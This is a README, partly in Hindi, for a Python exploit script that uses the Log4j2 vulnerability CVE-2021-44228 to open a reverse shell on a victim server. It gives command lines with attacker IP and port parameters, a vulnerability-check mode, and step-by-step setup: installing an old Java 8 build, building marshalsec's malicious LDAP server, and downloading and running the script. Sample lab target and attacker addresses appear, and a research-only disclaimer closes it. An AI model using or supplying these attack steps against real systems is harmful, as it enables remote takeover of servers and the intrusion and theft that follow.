
Log4j2 CVE-2021-44228 revshell, बेशक यह बेकार है!!
For reverse shell:
$~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [AttackerPort] -hp [HTTPServerPort]
For check exploitable:
$~ python3 Log4j2-revshell.py -M check -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [AttackerPort]
$~ python3 Log4j2-revshell.py -h
usage: Log4j2-revshell.py [-h] -M MODE -u TARGET -l LHOST -p LPORT
[-hp HTTPPORT] [-V]
Log4j2 CVE-2021-44228 Reverse Shell
optional arguments:
-h, --help show this help message and exit
-M MODE, --mode MODE Mode: check | rev
-u TARGET, --target TARGET
Target full URL, http://www.victimLog4j.xyz:8080
-l LHOST, --lhost LHOST
Attacker IP for receive revshell
-p LPORT, --lport LPORT
Attacker port for receive revshell
-hp HTTPPORT, --httpport HTTPPORT
HTTP server port on attacker host, default is 8888
-V, --version show program's version number and exit
1. Marshalsec jndi.LDAPRefServer # यहाँ देखें, https://github.com/mbechler/marshalsec
2. Java 8 # आप Java 8 यहाँ प्राप्त कर सकते हैं https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html,
सुझाव है कि jdk-8u181-linux-x64.tar.gz [Java 1.8.0_181] इंस्टॉल करें
3. This script, Log4j2-revshell.py
$ ब्राउज़र खोलें और Java 8 डाउनलोड करें https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html
Java SE Development Kit 8u181 अनुभाग में, अपने OS के अनुसार jdk-8u181-linux-x64.tar.gz या उपयुक्त पैकेज चुनें।
$ sudo mkdir /usr/lib/jvm # यदि आपके पास अभी तक यह निर्देशिका नहीं है तो बनाएँ
$ cd /usr/lib/jvm
$ sudo tar xzvf ~/Downloads/jdk-8u181-linux-x64.tar.gz # डाउनलोड किए गए jdk-8u181-linux-x64.tar.gz को /usr/lib/jvm में निकालें
$ sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_181/bin/java" 1
$ sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_181/bin/javac" 1
$ sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_181/bin/javaws" 1
$ sudo update-alternatives --set java /usr/lib/jvm/jdk1.8.0_181/bin/java
$ sudo update-alternatives --set javac /usr/lib/jvm/jdk1.8.0_181/bin/javac
$ sudo update-alternatives --set javaws /usr/lib/jvm/jdk1.8.0_181/bin/javaws
$ java -version # सत्यापित करें कि आप Java 1.8.0_181 चला रहे हैं
$ git clone https://github.com/mbechler/marshalsec /tmp/Log4j2-dir; cd /tmp/Log4j2-dir # marshalsec jndi.LDAPRefServer इंस्टॉल करें
$ sudo apt install -y maven # marshalsec को Java बिल्डर maven के साथ बनाएँ। यदि आपके पास maven नहीं है, तो कृपया पहले इंस्टॉल करें
$ mvn clean package -DskipTests # maven के साथ marshalsec टूल बनाएँ
$ cd /tmp/Log4j2-dir; wget -q https://raw.githubusercontent.com/faisalfs10x/Log4j2-CVE-2021-44228-revshell/main/Log4j2-revshell.py
$ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [AttackerPort] -hp [HTTPServerPort]
लक्ष्य होस्ट: http://192.168.5.122:8080
आक्रमणकारी होस्ट: 192.168.5.120
- Ubuntu 18.04
यह स्क्रिप्ट केवल सुरक्षा विश्लेषण और अनुसंधान के लिए है, इसलिए यदि इसका उपयोग अवैध गतिविधियों के लिए किया जाता है तो मैं उत्तरदायी नहीं होऊँगा।